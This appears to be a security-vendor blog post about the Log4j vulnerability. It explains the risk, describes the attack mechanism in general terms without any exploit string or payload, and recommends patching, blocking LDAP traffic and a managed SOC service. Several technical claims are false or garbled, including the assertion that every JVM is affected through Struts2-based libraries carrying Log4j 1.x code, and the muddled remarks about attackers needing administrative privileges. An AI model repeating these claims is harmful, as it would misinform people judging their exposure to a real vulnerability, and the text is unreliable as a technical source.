One of the most popular logging libraries in Java, Log4j, was recently discovered to have serious cybersecurity vulnerabilities. While the project is working hard to patch up these holes, it’s important that everyone update their installations of the library as soon as possible to protect themselves from cyberattacks. This vulnerability was first discovered by Alibaba’s security team who say it could potentially be disastrous to your business, especially if you are using Log4j on a cloud service like Amazon Web Service, Microsoft Azure or others.
What is this vulnerability?
The Log4j Java library, part of Apache’s Jakarta Project and one of the most popular logging libraries for Java applications, has a critical-severity security vulnerability that lets hackers gain full access and control over systems using it. If left unpatched, or if an attacker finds their way into your servers and gains administrative privileges before patching, they can use malicious commands to compromise your server at will. If they wanted to steal sensitive data or install ransomware on your server—or perform other nefarious activities—they could probably get away with it undetected thanks to flaws in Log4j’s code. And while these vulnerabilities have been patched, many companies have likely not yet applied those patches because they are no longer receiving regular updates from their vendor. Since many businesses don’t bother updating widely used or legacy components like Log4j, it’s best to be proactive about securing your organization against such attacks by applying patches as soon as possible after release. As with many other attacks we’ve seen before, it’s not necessarily difficult for attackers to place malicious payloads into logs coming out of apps and databases—and once there, it’s only a matter of time before those malicious messages make their way back into IT infrastructure. And that means trouble for businesses large and small worldwide.
What you need to know right now
This looks to be bad. Really bad. Even if you aren’t using Log4j – there’s still a possibility your business could fall victim. There are countless SaaS companies out there that are likely running it and what's worse, the level of sophistication required for executing a successful attack is remarkably low. Like sub-script kiddie low.
Any company running Java Virtual Machine (JVM) might be affected since JVM utilizes libraries based off of Apache Struts2, which contains portions of unmaintained code used by Log4j 1.x. Or at least until it patched up almost three weeks ago.
What's worse is this exploit does not require authentication to be successful and even though the sun has been setting on Java for quite sometime, Java is still everywhere. Even among home devices and routers, for all you work-from-home types.
How does the Log4j exploit work?
This new attack against Log4j allows hackers to execute code on systems running vulnerable versions of its open-source framework. Attackers can easily pass a command to the log library hidden among the log data. When received by the software, the command will execute as opposed to simply being logged away in the library. This exploit can conduct network look-ups which allows it to interpret log messages as a URL and execute any payload contained therein with full privileges. This threatens to relinquish full control of systems and servers, leaving them vulnerable to anything from exfiltration of data to devastating ransomware. With one simple line of code, users are opened up to one potentially disastrous threat after another.
How do I fix this problem?
With many companies relying on outdated or non-updated instances of Log4j, it’s no surprise many are still exposed to dangerous vulnerabilities. To determine if your company’s infrastructure is at risk, we recommend checking with each IT department first; they’ll be able to more accurately identify whether their systems are affected and what steps should be taken next.
If you're in the industry, you can filter out traffic that is auto-scanning for this vulnerability. However, the ability to obfuscate the exploit string is all too easy, so while this may be low hanging fruit, it, alone, won't protect your network. But the exploit leverages LDAP. If you can block all LDAP traffic, I would recommend doing so.
Finally, if you aren't already doing so, you might want to think about a 24x7 Security Operation Center (SOC) service available from an MSSP. Intelligence-driven security services are designed to use real-time threat information to hunt for threats that may be lurking in our compromised spaces. Like the zero-day above that almost all security tools have missed.
In the meantime: patch. Quickly.